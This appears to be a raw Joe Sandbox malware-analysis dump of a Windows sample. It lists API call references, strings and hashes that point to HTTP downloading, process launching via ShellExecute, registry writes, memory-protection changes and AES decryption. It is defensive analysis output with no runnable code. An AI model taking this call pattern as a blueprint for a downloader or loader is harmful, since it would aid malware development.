                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                              • String ID: %s: %s$Error protecting memory page
                                                              • API String ID: 839691724-1484484497

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004018C5
                                                              • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004018E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileInternet$PointerRead
                                                              • String ID: text
                                                              • API String ID: 3197321146-999008199

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00414C8E,00000000,74DEDF80,?,00000000,?,004190D3), ref: 00414CB1
                                                              • TerminateProcess.KERNEL32(00000000,?,00414C8E,00000000,74DEDF80,?,00000000,?,004190D3), ref: 00414CB8
                                                              • ExitProcess.KERNEL32 ref: 00414CCA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007AB16E
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 007AB18E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7aa000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00414F0A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040591F,00000000,A1833436), ref: 00414F1D
                                                                • Part of subcall function 00414F0A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F4E
                                                              • Sleep.KERNELBASE(000003E8,?,756CD120), ref: 00406430
                                                              • __Init_thread_footer.LIBCMT ref: 00406662
                                                              • Sleep.KERNEL32(00000BB8,00000000,?,00438C00,00438ED4,00438ED5,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 0040686A
                                                                • Part of subcall function 00407390: __Init_thread_footer.LIBCMT ref: 004073F9
                                                                • Part of subcall function 00407420: __Init_thread_footer.LIBCMT ref: 0040747A
                                                              • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,00433998,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 0040710F
                                                              • Sleep.KERNEL32(00000BB8,00000000,00000000,00433998), ref: 0040721D
                                                                • Part of subcall function 00408C70: __Init_thread_footer.LIBCMT ref: 00408CD9
                                                                • Part of subcall function 00408DE0: __Init_thread_footer.LIBCMT ref: 00408E39
                                                                • Part of subcall function 00408D60: __Init_thread_footer.LIBCMT ref: 00408DB9
                                                                • Part of subcall function 00408D00: __Init_thread_footer.LIBCMT ref: 00408D51
                                                                • Part of subcall function 004063D0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004062A3
                                                                • Part of subcall function 004063D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004062C5
                                                                • Part of subcall function 004063D0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004062ED
                                                                • Part of subcall function 004063D0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004062F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Init_thread_footer$Sleep$Time$CloseCreateFileOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                              • String ID: @BAO$O@K\$SUB=$Y@BA$ZK\.$get$mixone$rmBK$updateSW$>
                                                              • API String ID: 1876388665-2074545787
                                                              • Opcode ID: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                              • Instruction ID: 5f27ce350e39438f477c09faef13317f674b6310b8c83854bcab6de2c29012ff
                                                              • Opcode Fuzzy Hash: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                              • Instruction Fuzzy Hash: 19829571D102049ACB15FBB5D95AAEEB3746F14308F10817FE412771D2EE7C6A48CBAA

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                              • __cftof.LIBCMT ref: 10001624
                                                              • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                              • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                              • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                              • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                              • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                              • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                              • String ID: GET$http://
                                                              • API String ID: 1233269984-1632879366
                                                              • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                              • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                              • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                              • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                              Control-flow Graph

                                                              APIs
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401777
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 0040179D
                                                                • Part of subcall function 00402460: Concurrency::cancel_current_task.LIBCPMT ref: 00402593
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017C3
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017E9
                                                              Strings
                                                              • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004017C7
                                                              • GET, xrefs: 00401F41
                                                              • text, xrefs: 00401B1C
                                                              • Pa3o, xrefs: 00401EBE
                                                              • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017A1
                                                              • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401739
                                                              • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 0040177B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                              • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$Pa3o$text
                                                              • API String ID: 2146599340-3316554447
                                                              • Opcode ID: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                              • Instruction ID: dd27eeabaf9dd409a411fe115e39f4e0811eb9476ae1debadf98a18efd4bf4d9
                                                              • Opcode Fuzzy Hash: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                              • Instruction Fuzzy Hash: AF314271D00108AFDB14DFA9CC85FEEBB79EB48714F60C02AE521761D0D778A644CBA5

                                                              Control-flow Graph

                                                              • control_flow_graph starting at block 217003c-2170047; named API calls shown: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0217024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 20d72d97d4b91e157398b5588176fb2569ed1a9d1da1e1fd342d4343e33d2590
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: C7526975A01229DFDB64CF58C984BACBBB1BF49304F1580E9E94DAB351DB30AA85CF14

                                                              Control-flow Graph

                                                              • control_flow_graph starting at block 10001175-100011a6; named API calls shown: InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                              • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                              • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                              • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                              • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                              • String ID: text
                                                              • API String ID: 1154000607-999008199
                                                              • Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                                              • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                              • Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                                              • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                                • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: .exe$open
                                                              • API String ID: 1627157292-49952409
                                                              • Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                                              • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                              • Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                                              • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                              Control-flow Graph

                                                              • control_flow_graph starting at block 401d20-401d6e; named API calls shown: InternetOpenA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: http://
                                                              • API String ID: 0-1121587658
                                                              • Opcode ID: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                              • Instruction ID: 400ae1f0683e16050dc0c92ac0c9e39ab50ada623451b1719e06fb015b7fc8db
                                                              • Opcode Fuzzy Hash: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                              • Instruction Fuzzy Hash: 9551C171E002099FDB14CFA8C885BEEBBB5EF48714F20812AE811B72D1D7799945CBA4

                                                              Control-flow Graph

                                                              • control_flow_graph starting at block 402080-40209b; named API calls shown: CreateFileA, WriteFile, CloseHandle
                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020B6
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 004020D7
                                                              • CloseHandle.KERNEL32(00000000), ref: 004020DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleWrite
                                                              • String ID:
                                                              • API String ID: 1065093856-0
                                                              • Opcode ID: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                              • Instruction ID: 6c77038d191d3f97727d8eed6fdb37873f2ee397ff2ea2baf70002bfc895bc0c
                                                              • Opcode Fuzzy Hash: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                              • Instruction Fuzzy Hash: AA01DB31601204EBD730DB68DD49BAEB7A4EB48720F40413EFA45A61D0CEB46945DB98
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02170223,?,?), ref: 02170E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02170223,?,?), ref: 02170E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: f6eda14345538900ca3a5bcd661a1e8535e70606a6f2fc7bf9789d366219cde3
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 9DD0123114522877D7002A94DC09BCD7B1CDF09B66F108011FB0DD9080CB70954046E5
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                              • Instruction ID: 892a2f85d179e940e32edf4c269616ac7a5d26f5bdb6421d04aa5267c10937ef
                                                              • Opcode Fuzzy Hash: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                              • Instruction Fuzzy Hash: 39E02B31643228E6D7212726AC00BDBB6499F417B0F550127FC64D2291CF6CDCD1C1AF
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                              • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                              • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                              • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                              APIs
                                                              • _free.LIBCMT ref: 0041339B
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast_free
                                                              • String ID:
                                                              • API String ID: 1353095263-0
                                                              • Opcode ID: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                              • Instruction ID: 55f22833085c7284391f6abc04ff7850bc4061f265e97900bf2c914d8fb6d659
                                                              • Opcode Fuzzy Hash: c45df409a2209a6dae7faf0f0439407c1fc408f0f17bd796a6383b085c05d1ef
                                                              • Instruction Fuzzy Hash: CFC08C3110020CBBCB00DB42C806A8E7BA8DB80368F200048F40017240CAB1EE409694
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007AAE56
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 007AA000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7aa000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 2fa29c7cb468a6ad3afcc210ed428314e6b96e5a785deadee78f6082c69949ad
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 8E112B79A00208EFDB01DF98C985E99BBF5AF48351F058094F9489B362D375EA50DB80
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00402BEF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                              • Instruction ID: 757219c421bd17c9bacb0b6147dd7d19cb6d4b5150cd33f247450a4ef3d9d6e3
                                                              • Opcode Fuzzy Hash: 13b5f206aa341d0fbaeb0a1724a0e1e5cbc72d21563ec56196b404c9d5a1e8b3
                                                              • Instruction Fuzzy Hash: B6C0483204420DFFCF025F81EC04C9E3F2AFB08260B448024FA1824030CB339931AB95
                                                              APIs
                                                              • VirtualFree.KERNELBASE(?,?,?), ref: 00402C0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                              • Instruction ID: 453d66be5c1bbbae9c6a98f4a0570dcf14d6ac7d0ccfee59b5e1430b94dd3887
                                                              • Opcode Fuzzy Hash: 60f6fe46419e245ea3fe1cb545ffcffb3b8132432e166037cb3dc50b65685cfd
                                                              • Instruction Fuzzy Hash: 56B0923200020CFBCF021F81EC0489D3F2AFB08260B448024FA1C44031CB339571AB84
                                                              APIs
                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,00437018), ref: 02173797
                                                              • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 021737BB
                                                              • _mbstowcs.LIBCMT ref: 0217380E
                                                              • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 02173825
                                                              • GetLastError.KERNEL32 ref: 0217382F
                                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 02173857
                                                              • GetLastError.KERNEL32 ref: 02173861
                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02173871
                                                              • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 02173933
                                                              • CryptDestroyKey.ADVAPI32(?), ref: 021739A5
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 02173A25
                                                              Strings
                                                              • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02173773, 02173A0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease___std_exception_copy_mbstowcs
                                                              • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                              • API String ID: 4265767208-63410773
                                                              • Opcode ID: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                              • Instruction ID: 02fef7121461014f27cd35132ff79c4b0e5f1d07c10f89f5b7faf8c97c00cb62
                                                              • Opcode Fuzzy Hash: 9a155a2b7c47821049898c79bfb8f12405dbdff61417cc380cd6b9e646117a85
                                                              • Instruction Fuzzy Hash: 5D819071B40218AFEB209F24CC45B9EBBB6FF85310F4081E9E94DE7281DB319A859F55
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0217924B
                                                              • __Init_thread_footer.LIBCMT ref: 021794E5
                                                              • __Init_thread_footer.LIBCMT ref: 02179331
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              • __Init_thread_footer.LIBCMT ref: 021796D6
                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 021798A4
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$Init_thread_footer$EnterLeave$FileIos_base_dtorModuleNamestd::ios_base::_
                                                              • String ID: P:C$ZYA.$kc~z
                                                              • API String ID: 1348255701-279448249
                                                              • Opcode ID: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                              • Instruction ID: a710e2f291c15ef4190545978f1f4b0f649085cb8ac869ad47bc92f2895a5690
                                                              • Opcode Fuzzy Hash: 10e198ffe07126ebbc5d9e4083672b07ced8549812fe91e39b1e8414d8359049
                                                              • Instruction Fuzzy Hash: 1442F5709402448FDB18DF28DC88BA9B7B1BF89314F1042EDE44997291DB75AF89CF85
                                                              APIs
                                                                • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
